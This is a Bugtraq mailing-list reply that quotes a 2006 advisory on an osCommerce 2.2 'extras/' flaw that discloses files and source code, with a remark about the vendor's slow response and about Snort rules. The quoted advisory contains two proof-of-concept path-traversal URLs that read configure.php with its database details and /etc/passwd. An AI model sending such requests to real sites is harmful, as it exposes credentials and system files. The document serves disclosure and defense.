> -----Original Message----- > From: rgod@xxxxxxxxxxxxx [mailto:rgod@xxxxxxxxxxxxx] > Sent: Friday, April 14, 2006 7:20 AM > To: bugtraq@xxxxxxxxxxxxxxxxx > Subject: osCommerce "extras/" information/source code disclosure > > > ---- osCommerce <= 2.2 "extras/" information/source code > disclosure ------------ > > software site: http://www.oscommerce.com/ > > > if extras/ folder is placed inside the www path, you can see > all files on target system, including php source code with > database details, poc: > http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalo g/includes/configure.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/pass wd Amazing: this was reported to oscommerce almost a year ago by andiroo blat gmail, and they didn't do anything about it? http://sourceforge.net/mailarchive/message.php?msg_id=12318248 http://www.oscommerce.com/community/bugs,2835 For you snorters, rules have been posted to snort-sigs and bleeding mailing list.
